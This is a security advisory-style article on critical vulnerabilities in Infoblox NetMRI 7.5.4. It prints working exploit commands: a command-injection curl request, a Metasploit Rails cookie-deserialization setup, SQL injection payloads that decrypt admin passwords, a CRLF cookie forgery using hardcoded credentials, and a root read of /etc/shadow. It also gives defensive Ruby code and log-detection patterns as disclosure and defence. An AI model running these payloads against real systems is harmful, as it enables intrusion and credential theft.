
Researchers Discover Critical NetMRI Bugs Enabling Full Administrative Access

Security researchers have disclosed a series of critical vulnerabilities in Infoblox’s NetMRI network automation and configuration management virtual appliance (version 7.5.4.104695).

These flaws allow unauthenticated attackers to achieve full administrative control over affected devices, highlighting the importance of timely security updates in network management systems.

The research, which resulted in multiple CVE assignments, details exploits ranging from unauthenticated command injection to privilege escalation via hardcoded credentials and cookie forgery.

This article provides an in-depth technical walkthrough of these vulnerabilities, the exploitation techniques, and mitigations.

Technical Breakdown of the Vulnerabilities

1. Unauthenticated Command Injection (CVE-2025-32813)

A major flaw exists in the /webui/application/get_saml_request endpoint. The endpoint retrieves SAML requests and interpolates the user-controlled saml_id parameter directly into a shell command executed via Ruby’s IO.popen, leading to command injection:

Vulnerable code excerpt:

```ruby
IO.popen("python3 /skipjack/app/scripts/saml_helper/get_saml_request.py #{saml_id}")
```

By crafting a saml_id that includes shell metacharacters, an attacker can execute arbitrary OS commands:

Exploit Example:

```shell
curl -k "https://<NETMRI_HOST>/webui/application/get_saml_request?saml_id=1%26http://$(whoami)"
```

Appending shell commands after an ampersand (&) allows execution, with output delivered in the HTTP response.
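The root cause is the single interpolated string handed to the shell. The following Ruby is an added example, not NetMRI's code: it mirrors the vulnerable pattern beside a hardened version that allow-lists the identifier (a decimal id is an assumption made here) and passes an argv array so no shell is involved.

```ruby
require "open3"

# Helper path as quoted in the article.
SAML_HELPER = "/skipjack/app/scripts/saml_helper/get_saml_request.py"

# Mirrors the vulnerable pattern: a single string is handed to /bin/sh, so any
# shell metacharacter in saml_id ends the python3 command and starts another.
def vulnerable_command(saml_id)
  "python3 #{SAML_HELPER} #{saml_id}"
end

# Characters /bin/sh treats as syntax rather than as part of an argument.
SHELL_METACHARS = /[;&|`$<>(){}\\'"\s]/

def shell_metachar?(value)
  SHELL_METACHARS.match?(value)
end

# Hardened: allow-list the identifier first (a decimal id is an assumption for
# this example), then return an argv array. Passing an array to IO.popen/Open3
# execs python3 directly; no shell ever sees the value.
def build_saml_command(saml_id)
  unless saml_id.is_a?(String) && saml_id.match?(/\A\d{1,10}\z/)
    raise ArgumentError, "saml_id must be a decimal identifier"
  end
  ["python3", SAML_HELPER, saml_id]
end

def run_saml_helper(saml_id)
  out, status = Open3.capture2(*build_saml_command(saml_id)) # array form, not a string
  status.success? ? out : nil
end

if __FILE__ == $PROGRAM_NAME
  hostile = "1&whoami"
  puts "as one shell string: #{vulnerable_command(hostile)}" # sh would also run whoami
  puts "metacharacter present: #{shell_metachar?(hostile)}"
  begin
    build_saml_command(hostile)
  rescue ArgumentError => e
    puts "hardened builder rejects it: #{e.message}"
  end
  p build_saml_command("1")
end
```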

2. Remote Code Execution via Hardcoded Rails Cookie Secret

NetMRI contains a Ruby on Rails component with a hardcoded session secret found at /skipjack/app/rails/config/session_secret.txt. This facilitates deserialization attacks: anyone with the key can forge session cookies, leading to remote code execution (RCE).

Metasploit module usage:

```shell
use exploit/multi/http/rails_secret_deserialization
set COOKIE_NAME _netmri
set SECRET <hardcoded_secret>
set RHOST <NETMRI_HOST>
run
```

A forged cookie can grant shell access as the NetMRI user, which can be escalated to root using sudo (due to an insecure sudoers configuration):

```shell
sudo /bin/sh
```

3. SQL Injection (CVE-2025-32814, CVE-2024-52874)

Unauthenticated SQL Injection

The skipjackUsername parameter on the login page is vulnerable, allowing attackers to extract database contents, including encrypted admin passwords.

Proof of Concept:

```shell
curl -k "https://<NETMRI_HOST>/netmri/config/userAdmin/login.tdf?skipjackUsername=admin\"+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=\"admin\"),\"password\",1),CHAR(126)),null)--&skipjackPassword=anything"
```

Authenticated SQL Injection

Admin users can trigger SQL injection via the Scripts parameter:

```shell
curl -k "https://<NETMRI_HOST>/netmri/ccs/tx/run/Run.tdf?Scripts=1+AND+updatexml(rand(),concat(CHAR(126),NetmriDecrypt((select%20PasswordSecure%20from%20skipjack.ACLUser%20where%20UserName=\"admin\"),\"password\",1),CHAR(126)),null)--"
```

4. Privilege Escalation and Cookie Forgery (CVE-2025-32815)

Hardcoded credentials in a configuration file (syslog.cfg) can be used against the internal APIs SetRawCookie.tdf and SetCookie.tdf. These endpoints are vulnerable to newline injection, allowing attackers to forge session cookies and impersonate the admin:

Cookie Forgery Example:

```shell
curl -u '_pm:pm19726' -k "https://<NETMRI_HOST>/netmri/common/SetRawCookie.tdf?name=letmein&value=%78%79%7a%0d%0a%55%73%65%72%4e%61%6d%65%3d%61%64%6d%69%6e"
```

Decoded, the value contains a carriage return and line feed, so the stored cookie file gains a second line:

```text
letmein
UserName=admin
```

This session now grants administrative access in the application.
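The defensive fix for this class of bug is to validate cookie names and values against the permitted character set before they are ever written. This Ruby helper is an added example, not NetMRI's code: it decodes the article's percent-encoded value to show the embedded CR/LF and refuses it, while accepting a well-formed value.

```ruby
require "cgi"

# Percent-decodes a cookie value as received in the query string.
def decode_cookie_value(encoded)
  CGI.unescape(encoded)
end

# RFC 6265 cookie-value octets: printable US-ASCII excluding control
# characters, whitespace, double quote, comma, semicolon and backslash.
COOKIE_VALUE = /\A[\x21\x23-\x2B\x2D-\x3A\x3C-\x5B\x5D-\x7E]*\z/
# RFC 6265 cookie-name token characters.
COOKIE_NAME = /\A[A-Za-z0-9!#$%&'*+\-.^_`|~]+\z/

# Returns a Set-Cookie header line, or raises when the name or value could
# break out of the header or the backing store (for example via "\r\n").
def safe_set_cookie(name, value)
  raise ArgumentError, "invalid cookie name" unless COOKIE_NAME.match?(name)
  raise ArgumentError, "invalid cookie value" unless COOKIE_VALUE.match?(value)
  "Set-Cookie: #{name}=#{value}; Path=/; Secure; HttpOnly; SameSite=Strict"
end

if __FILE__ == $PROGRAM_NAME
  # The encoded value from the article's request.
  forged = decode_cookie_value("%78%79%7a%0d%0a%55%73%65%72%4e%61%6d%65%3d%61%64%6d%69%6e")
  p forged # "xyz\r\nUserName=admin"
  begin
    safe_set_cookie("letmein", forged)
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
  puts safe_set_cookie("letmein", "xyz")
end
```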

5. Arbitrary File Read as Root (CVE-2024-54188)

A Java servlet (ViewerFileServlet) exposes a file read vulnerability:

Exploit Example:

```shell
curl -b <admin_cookie> "https://<NETMRI_HOST>/visual/ViewerFileServlet?fileName=/etc/shadow"
```

Authenticated attackers can read any file as root, exposing sensitive operating system and application data.

Mitigation and Recommendations

These vulnerabilities, especially the unauthenticated command and SQL injection, RCE through cookie forging, and admin escalation, represent an immediate risk for networks running affected NetMRI versions.

Remediation Steps:

  • Upgrade NetMRI to version 7.6.1 or later, which patches all reported vulnerabilities.
  • Remove and rotate any hardcoded or leaked credentials.
  • Audit custom scripts and integrations for persistent backdoors.
  • Monitor server logs for suspicious access to vulnerable endpoints.
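For the last step, the endpoints and parameters named in this article are enough to build a first-pass log check. The Ruby below is an added example, not from the article or Infoblox: it parses common-log-format access lines (constructed samples, not real traffic) and flags requests to the vulnerable endpoints, raising severity when a decoded parameter carries that endpoint's indicator.

```ruby
require "cgi"

# Path => [finding label, indicator matched against each percent-decoded query value].
RULES = {
  "/webui/application/get_saml_request" => ["CVE-2025-32813 command injection", /[;&|`$]/],
  "/netmri/config/userAdmin/login.tdf"  => ["SQL injection (CVE-2025-32814 / CVE-2024-52874)", /updatexml|NetmriDecrypt|\bselect\b/i],
  "/netmri/ccs/tx/run/Run.tdf"          => ["SQL injection (CVE-2025-32814 / CVE-2024-52874)", /updatexml|NetmriDecrypt|\bselect\b/i],
  "/netmri/common/SetRawCookie.tdf"     => ["CVE-2025-32815 cookie forgery", /[\r\n]/],
  "/netmri/common/SetCookie.tdf"        => ["CVE-2025-32815 cookie forgery", /[\r\n]/],
  "/visual/ViewerFileServlet"           => ["CVE-2024-54188 arbitrary file read", %r{\A/|\.\.}],
}.freeze

# Parses a common-log-format line into [client, method, path, query]; nil otherwise.
def parse_access_line(line)
  m = line.match(/\A(\S+) \S+ \S+ \[[^\]]*\] "(\S+) ([^?\s"]+)(?:\?([^\s"]*))?[^"]*"/)
  m && [m[1], m[2], m[3], m[4].to_s]
end

# Any request to a listed endpoint is worth a look (:info); one whose decoded
# parameters carry the endpoint's indicator is a likely exploitation attempt (:high).
def scan_access_log(lines)
  lines.each_with_object([]) do |line, findings|
    client, _method, path, query = parse_access_line(line)
    next unless client && RULES.key?(path)
    label, pattern = RULES[path]
    values = query.split("&").map { |kv| CGI.unescape(kv.split("=", 2)[1].to_s) }
    hit = values.any? { |v| pattern.match?(v) }
    findings << { client: client, path: path, severity: hit ? :high : :info,
                  rule: hit ? label : "access to vulnerable endpoint" }
  end
end

# Constructed sample lines (not real traffic); paths and parameters follow the article.
SAMPLE_LOG = [
  '10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /webui/application/get_saml_request?saml_id=1%26whoami HTTP/1.1" 200 512',
  '10.0.0.6 - - [01/Jan/2025:10:00:01 +0000] "GET /netmri/common/SetRawCookie.tdf?name=letmein&value=%78%0d%0aUserName%3dadmin HTTP/1.1" 200 12',
  '10.0.0.7 - - [01/Jan/2025:10:00:02 +0000] "GET /netmri/config/userAdmin/login.tdf?skipjackUsername=alice&skipjackPassword=x HTTP/1.1" 302 0',
  '10.0.0.8 - - [01/Jan/2025:10:00:03 +0000] "GET /visual/ViewerFileServlet?fileName=/etc/shadow HTTP/1.1" 200 1024',
  '10.0.0.9 - - [01/Jan/2025:10:00:04 +0000] "GET /webui/index.html HTTP/1.1" 200 2048',
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_access_log(SAMPLE_LOG).each { |f| puts "#{f[:severity]} #{f[:client]} #{f[:path]} #{f[:rule]}" }
end
```

The :info hits matter too after patching: legitimate traffic to login.tdf is expected, but any pre-patch request to get_saml_request or SetRawCookie.tdf from an unfamiliar client deserves review.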

The discovery of these flaws in Infoblox NetMRI highlights the far-reaching impact of web application vulnerabilities in network management products. Organizations are strongly advised to patch urgently, as exploitation can lead to total compromise of network infrastructure.

Priya
